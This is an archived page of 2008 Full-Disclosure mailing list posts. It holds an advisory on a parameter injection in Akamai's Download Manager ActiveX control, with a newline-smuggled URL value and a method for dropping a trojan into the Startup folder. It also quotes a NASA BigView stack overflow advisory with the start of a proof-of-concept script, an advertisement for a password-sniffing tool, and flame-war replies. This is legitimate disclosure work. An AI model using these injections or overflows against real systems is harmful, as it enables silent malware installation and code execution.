Akamai Download Manager ActiveX Control 2.2.3.5



Details:

The file "http://dlm.tools.akamai.com/tools/upgrade.html"; is a
sample that calls this ActiveX Control, its parameter is set as
follows:

http://dlm.tools.akamai.com/tools_files/Readme.txt";>

Then the value of "URL" is set.

However, if we inject other characters to "URL", it also could be
parsed correctly. For example:

http://dlm.tools.akamai.com/tools_files/Readme.txt\x0Areferer=http://ruder.cdut.net";>

Since the parameter values set by ActiveX are saved in a temporary
file as INI file format, in the above manner the value of "referer"
will be changed.

In addition, the parameter "target" is used to setting the
loacation of the downloaded file, it has following meanings:

"DESKTOP"the file will be saved on the desktop
"AUTO"   the file will be saved in Temporary Internet 
Files
""   ask the user to choose the saving location

Normally the value of "target" can only be set as the above three
values, any other values will be filtered.

Nevertheless, the parameter injection vulnerability can set the
value of "target" arbitrarily, if the value is a valid file path,
Akamai Download Manager will download the target file directly in it
without any interaction with users. As a result, attackers can
construct a vicious web page to download a file that could be
controled to any location of the user's system.

One of the possible ways of attacking is to download the trojan in
"C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
directory, then it will be executed when next time the user logs in to
the system.



How to Reproduce:

An example exploit is available on:

http://ruder.cdut.net/attach/Akamai_DM_Vul/Akamai_DM_Vul_Exploit.html

This exploit will download the following file to your "Startup"
directory with a new name "calc_run.exe":

http://ruder.cdut.net/attach/calc.exe

MD5 Hash:E3FCB903305F8EE5551EA66F5C096737



Solution:

The fixed version is 2.2.3.7, please update your Akamai Download
Manager via the following url:

http://dlm.tools.akamai.com/tools/upgrade.html

Akamai has released an advisory for this vulnerability which is
available on:

http://www.securityfocus.com/archive/1/493077/30/0/threaded



CVE Information:

CVE-2008-1770



Disclosure Timeline:

2008.04.02Vendor notified via email
2008.04.03Vendor responded
2008.04.22The vendor sent me the new edition of the product
2008.04.22Confirmed the vulnerability had been fixed correctly
2008.05.12The vendor had released the fixed edition
silently, and did not inform me or release public advisory
2008.05.12Asked them for the reason
2008.05.12Vendor replied: "Once we are sure that all of
our customers have been given the opportunity to upgrade, we will post
a public advisory"
2008.05.12Decided to give the maximum of two weeks to them
for pushing the patch
2008.06.02Sent a warning of the coming independent
advisory, and asked the vendor to join us
2008.06.02Vendor asked for an additional 48 hours for
coordinated public disclosure
2008.06.04Coordinated vulnerability disclosure



--EOF--

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [offtopic] Fwd: Comments on: Phoenix MarsLander site hacked

2008-06-04 Thread Patrick Nolan 
> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
> Sent: Wednesday, June 04, 2008 12:29 PM
> 
> I'm not a troll, i'm a serious security researcher.
> 

A few articles or counter-articles
http://www.theregister.co.uk/2006/10/23/linguist_fingers_security_troll/page
2.html

http://blogs.ittoolbox.com/security/dmorrill/archives/security-trolls-n3td3v
-12460

> I was misrepresented in the media by SecurityFocus Robert 
> Lemos who ruined my image.
> 
> The findings have been post,
> 
> http://smear-campaign-against-n3td3v.blogspot.com/2007/12/smea
> r-campaign-against-n3td3v.html
> 
> All the best,
> n3td3v


Other links of non-interest...

http://ph33r.org/updates/2006/10/20/n3td3v-true-identity-finally-discovered.
html

http://sunbeltblog.blogspot.com/2006/10/hunt-for-n3td3v.html

http://www.hackerfactor.com/papers/who_is_n3td3v.pdf


.=Pn.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] CORE-2008-0425 - NASA BigView Stack Buffer Overflow

2008-06-04 Thread root 
Take this, Luigi "no fix" Auriemma!


CORE Security Technologies Advisories wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
>   Core Security Technologies - CoreLabs Advisory
>   http://www.coresecurity.com/corelabs/
> 
>NASA BigView Stack Buffer Overflow
> 
> 
> *Advisory Information*
> 
> Title: NASA BigView Stack Buffer Overflow
> Advisory ID: CORE-2008-0425
> Advisory URL: http://www.coresecurity.com/?action=item&id=2304
> Date published: 2008-06-04
> Date of last update: 2008-06-03
> Vendors contacted: NASA Ames Research Center
> Release mode: Coordinated release
> 
> 
> *Vulnerability Information*
> 
> Class: Stack Overflow
> Remotely Exploitable: Yes (client side)
> Locally Exploitable: No
> Bugtraq ID: 29517 
> CVE Name: CVE-2008-2542   
> 
> 
> *Vulnerability Description*
> 
> NASA BigView [1] allows for interactive panning and zooming of images of
> arbitrary size on desktop PCs running Linux. Using this software, one
> can explore (on relatively modest machines) images such as the Mars
> Orbiter Camera mosaic [92160x33280 pixels].
> 
> The BigView package suffers from a stack buffer overflow when parsing
> specially crafted (invalid) PNM input files. If successful, a malicious
> third party could trigger execution of arbitrary code within the context
> of the application, or otherwise crash the whole application. The
> vulnerability is caused due to the BigView package not properly checking
> the line length of the ascii PNM input files before copying it on a
> stack buffer. This can be exploited to get arbitrary code execution by
> opening a specially crafted file.
> 
> Exploitation of the PNM overflow problem requires the user to explicitly
> open a malicious file. The user should refrain from opening files from
> untrusted third parties or accessing untrusted Web sites until the patch
> is applied.
> 
> 
> *Vulnerable Packages*
> 
> . BigView revision 1.8.
> . Older BigView versions could be affected too, but they were not tested.
> 
> 
> *Non-vulnerable Packages*
> 
> . Available through BigView website (since June 2nd 2008, see below).
> 
> 
> *Vendor Information, Solutions and Workarounds*
> 
> The NASA BigView team has published a new version fixing this
> vulnerability. The tarball is available on BigView's website:
> http://opensource.arc.nasa.gov/project/bigview/
> 
> 
> *Credits*
> 
> This vulnerability was discovered and researched by Alfredo Ortega, from
> CORE IMPACT's Exploit Writing Team (EWT), Core Security Technologies.
> 
> 
> *Technical Description / Proof of Concept Code*
> 
> The BigView package suffers from a stack buffer overflow when parsing
> specially crafted (invalid) PNM input files. If successful, a malicious
> third party could trigger execution of arbitrary code within the context
> of the application, or otherwise crash the whole application.
> 
> The vulnerability resides in the following code at 'Ppm/ppm.C'. Here,
> the function 'getline()' reads data from a file into a buffer. This is
> the complete function:
> 
> /---
> 
> 418 static void getline(int fin, char* lineBuf, int len)
> 419 {
> 420   bool done=false;
> 421   int index=0;
> 422   lineBuf[index]=' ';
> 423   while(! done){
> 424 lineBuf[index] = getOneChar(fin);
> 425 if( lineBuf[index]==10 ) {
> 426   lineBuf[index]=0;
> 427   done=true;
> 428 }
> 429 ++index;
> 430   }
> 431   lineBuf[index]=0;
> 432 }
> 
> - ---/
> 
> Clearly the function requires the length of the destination buffer, but
> it is never used internally. This function is used on the
> 'PPM::ppmHeader()' function, to read the header of the PPM file.
> 
> /---
> 
> 56  PPM::ppmHeader(string filename, PPM::Format* format,
> 57 int* cpp, int* bpc,
> 58 int* sizeX, int* sizeY,
> 59 int* imageOffset)
> 60  {
> 61std::ostringstream err;
> 62char magic[3],lineBuf[512],junk;
> 63int res,max;
> .
> .
> .
> 115   while( junk == '#' ){
> 116 getline(fin,lineBuf,512);
> 117 cout << "Comment:"< 118 junk = getOneChar(fin);
> 119   }
> 
> - ---/
> 
> Here, the 'lineBuf' buffer is allocated on the stack, with a size of 512
> bytes. If the PPM contains a line longer than 512 bytes on the header, a
> buffer overflow will ensue. The following proof of concept is a python
> script that creates a PNM file that triggers the overflow and jumps to
> an arbitrary position (0x41414141 on the PoC) when loaded with BigView
> compiled on Ubuntu 6.06 LTS.
> 
> /---
> 
> ## BigView exploit
> ## Alfredo Ortega - Core Security Exploit Writers Team (EWT)
> ## Works against BigView "browse" revision 1.8 compiled on ubuntu 6.06
> Desktop i386
> 
> import struct
> w = open("crash.ppm","wb")
> w.write("""P3
> #CREATOR: The GIMP's PNM Filter Version
> 1.0AAA

[Full-disclosure] Akamai Technologies Security Advisory 2008-0001 (Download Manager)

2008-06-04 Thread Akamai Security Team 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Akamai Technologies Security Advisory 2008-0001


* Akamai ID: 2008-0002
* Date:  2008/04/20
* Product Name:  Download Manager
* Affected Versions: < 2.2.3.6
* Fixed Version: 2.2.3.7
* CVE IDs:   CVE-2008-1770
* CVSS Base Score:   (AV:R/AC:H/Au:NR/C:C/I:C/A:C/B:N) 8.0

* Product Description:

Akamai Download Manager is a client software application that helps
users download content easily, quickly, and reliably.  It is available
as an ActiveX component or Java applet and provides users the ability
to pause, resume downloading at a later time, and automatically
recover from dropped connections or system crashes.


* Vulnerability Description:

Akamai has become aware of a security vulnerability within the Akamai
Download Manager up to and including version 2.2.3.5 of the ActiveX
control.  For successful exploitation, this vulnerability requires a
user to be convinced to visit a malicious URL put into place by an
attacker. This may then lead to an unauthorized download and automatic
execution of arbitrary code run within the context of the victim user.

This vulnerability exist only in the Download Manager client
software and does not affect Akamai's services in any way.


* Patch Instructions:

For ActiveX versions:
Affected users can upgrade to the latest version of Akamai Download
Manager by visiting the following web page:

http://dlm.tools.akamai.com/tools/upgrade.html

Visiting that page or any other Download Manager enabled page will
prompt the user to install the latest version of the software
automatically.  Akamai has successfully coordinated with each of our
enterprise customers to ensure that all are distributing the patched
version.

To verify the correct version is installed:

~ 1) In Internet Explorer, choose "Internet Options..." from the
~"Tools" menu.

~ 2) Under the "General" tab, select "Settings..." from the "Temporary
~Internet files" section.

~ 3) Select "View Objects..." from the "Temporary Internet files
~folder" section.

~ 4) Find the item for "DownloadManager Control" and verify that the
~version is "2.2.3.5" or higher.

~ * If you wish to uninstall Download Manager, complete this last step:

~ 5) Find the item for "DownloadManager Control", right-click and
~select "Remove".

~ 6) When prompted to confirm, choose "Yes".

For Java versions: The java version is not persistently installed. No
action is required by the user.


* Credit:

CVE-2008-1770 was independently discovered and brought to Akamai's
attention by FortiNet (http://fortinet.com).


* Additional Information:

CVE-2008-1770

* About Akamai:

Akamai® is the leading global service provider for accelerating
content and business processes online. Thousands of organizations have
formed trusted relationships with Akamai, improving their revenue and
reducing costs by maximizing the performance of their online
businesses. Leveraging the Akamai EdgePlatform, these organizations
gain business advantage today, and have the foundation for the
emerging Web solutions of tomorrow. Akamai is "The Trusted Choice for
Online Business." For more information, visit www.akamai.com.

Our public key:

http://www.akamai.com/dl/akamai/Akamai_Security_General.pub

- 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (Darwin)

iQIcBAEBAgAGBQJIRr0qAAoJEEngXEVbkoPOCAIQALFsMqxvGd2cK/sv/YwOIyiQ
h8b8du+0cy10fIqo9ZGmWUXKNBJUm6sCpt1hZS2PGXxQ5hK8NT877qlQcl1cssVa
owug6Riw6qVvoNDYF44l73vNbS5ZJ9C9dTUkmKp9ixMGy2ZRZY34CPZ9DfYvwZzT
uMF5LifM3gxPyh/01mqKWu0OXaF/9XgItU37FZfXTkYpt9xdfbp9k9Xs9ANJGWx6
2PcTTH3l+tQf5DAAqoreXA4/iG+9/YukO5by0UHitzqPOg6gqgpyhS3UQH6VlBX/
t4EijL6NbTUYEkAYk6cBW1eBxv0yNHOwm++1duiDmp/zdhoYUnMhNuX2Sjrfq3YH
Tm9yU4exPnAsmmfJw9QuRXPoPhhJGOOkBM3FJWLesO6Sdw8ZSLnLUv34v2wEeGp0
ezJg4czr3ybmGJ8KrMpT+pZwuXqiUoIIiv+vxbugbtq/H0TSH2B0M7vs5uMfbUC+
b3LI8C6WV3rbqyPvD0cN7+GgCMQstUuywvpHGvIhC/YZ70ubPNS1VU5RRo17/WvU
fBN7DzfPShnubzRISu4VkMOGvN0VGXcGKYe858e3L/5s6dHTlm4k7eUlgt5f6gCd
Yw3q7ZNLfKETVNO4mhAjdJfcAYrMAaj3LsfsYh/jMUovST4kbRhTUPFoKiLQN3Jg
O4U7Bn8nlok3DY2zHYXE
=yGPc
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] next generation sniffer

2008-06-04 Thread inter inter 
[0x4553-Intercepter] offers the following features:

   + Sniffing passwords\hashes of the types:
  
ICQ\IRC\AIM\FTP\IMAP\POP3\SMTP\LDAP\BNC\SOCKS\HTTP\WWW\NNTP\CVS\TELNET\MRA\DC++\VNC\MYSQL\ORACLE
   + Sniffing chat messages of ICQ\AIM\JABBER\YAHOO\MSN\GADU-GADU\IRC\MRA
   + Promiscuous-mode scanning + ARP scanning + DHCP discovering
   + Changing MAC address of LAN adapters
   + Raw mode (with filtering rules)
   + eXtreme mode
   + Capturing packets and post-capture (offline) analyzing
   + Remote traffic capturing via RPCAP daemon
   + Built-in arp poison module
   + Reconstruction of SMTP\POP3 messages

Works on Windows NT(2K\XP\2k3\Vista).

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Gadi Evron not a troll but n3td3v is?

2008-06-04 Thread n3td3v 
On Wed, Jun 4, 2008 at 10:47 PM, Anders B Jansson <[EMAIL PROTECTED]> wrote:
> n3td3v wrote:
>> I'm not a troll, i'm a serious security researcher.
>>
>> I was misrepresented in the media by SecurityFocus Robert Lemos who
>> ruined my image.
>
> Except that your are not serious, you are not a researcher and you have
> not posted anything ever that has shown any clue what so ever about security.
>
> It is possible that you are misrepresented but then you are misrepresented
> by your own moronic rants.
> --
> // hdw
>

Why does Gadi Evron get good press and n3td3v get bad press? We both
rant our crap on the mailing lists and don't really know what we're
talking about, and both of us have no technical knowledge on any of
the topics we rant about, and we both have news groups for posting
news articles on.

All the best,

n3td3v

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/